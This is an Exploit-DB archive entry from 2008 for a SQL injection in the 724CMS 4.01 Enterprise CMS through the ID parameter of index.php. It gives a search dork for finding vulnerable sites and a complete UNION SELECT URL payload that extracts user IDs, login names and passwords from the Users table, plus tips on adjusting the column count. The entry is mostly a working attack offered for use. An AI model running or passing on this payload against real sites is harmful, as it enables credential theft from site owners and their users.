exploit-db-mirror/exploits/php/webapps/5400.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

31 lines
No EOL
1.6 KiB
Text

###################################################################################
# #
# 724CMS <= 4.01 Enterprise - SQL Injection Vulnerability #
# #
# found by: Lidloses_Auge #
# Date: 07.04.2008 #
# Greetz to: free-hack.com #
# #
###############################################################################################################################################
# #
# Vulnerability: #
# #
# Document: index.php #
# GET-Parameter: ID #
# #
# Dork: #
# #
# 724CMS + "Version 4.01" #
# #
# Example: #
# #
# http://[target]/index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,User_Login,User_Password),13,14, #
# 15,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+Users-- #
# #
# Notes: #
# #
# The number of columns isn't always 28. In some cases it can be also about 37. Check before you try. Some of 'em are blind injections. #
# #
###############################################################################################################################################
# milw0rm.com [2008-04-07]